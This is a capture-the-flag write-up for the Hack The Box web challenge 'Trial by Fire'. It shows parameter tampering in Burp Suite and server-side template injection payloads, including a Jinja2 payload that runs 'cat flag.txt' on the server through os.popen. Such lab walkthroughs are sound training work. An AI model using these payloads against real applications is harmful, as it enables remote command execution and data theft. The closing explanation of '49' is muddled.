🔥HTB Trial by Fire - Write-Up🔥

As you ascend the treacherous slopes of the Flame Peaks, the scorching heat and shifting volcanic terrain test your endurance with every step. Rivers of molten lava carve fiery paths through the mountains, illuminating the night with an eerie crimson glow. The air is thick with ash, and the distant rumble of the earth warns of the danger that lies ahead. At the heart of this infernal landscape, a colossal Fire Drake awaits—a guardian of flame and fury, determined to judge those who dare trespass. With eyes like embers and scales hardened by centuries of heat, the Fire Drake does not attack blindly. Instead, it weaves illusions of fear, manifesting your deepest doubts and past failures. To reach the Emberstone, the legendary artifact hidden beyond its lair, you must prove your resilience, defying both the drake’s scorching onslaught and the mental trials it conjures. Stand firm, outwit its trickery, and strike with precision—only those with unyielding courage and strategic mastery will endure the Trial by Fire and claim their place among the legends of Eldoria.

Start Burp Suite. Open the browser and paste the URL.

As you can see, it shows “49” along with the message “Perhaps 49 is the key.” This hints at a possible SSTI vulnerability. We attempt input in the “Enter your name” field and realize nothing is working, so we try another approach.

We discover it's impossible to defeat the dragon directly. Instead, we intercept the HTTP request using Burp Proxy to modify the following parameter:

outcome=defeat → outcome=victory

and that match : now after trying to exploit this variable we realise that doesn’t work’s to see the flag we will try another variable but in the repeater to perform several payload and be more faster for start wy try {{7*7}}

{{7*7}} — and it works! Now we try more advanced payloads such as {{config}}, and successfully retrieve internal app configuration.

And it works to, we realise that display all the config, now we will try to cat the flag. Then we try more advanced payloads, such as {{config.__class__.__init__.__globals__['os'].popen('cat flag.txt').read()}} , and successfully retrieve the flag .

From there, we inject code to read the flag file—success! We can also use intruder to send all payload at the same time

And as u can see we got 49 with 4 variable so we can use it to seeking the flag .

Finally, we learn that the number 49 was the key and corresponds to 4 variables used, guiding us to the flag.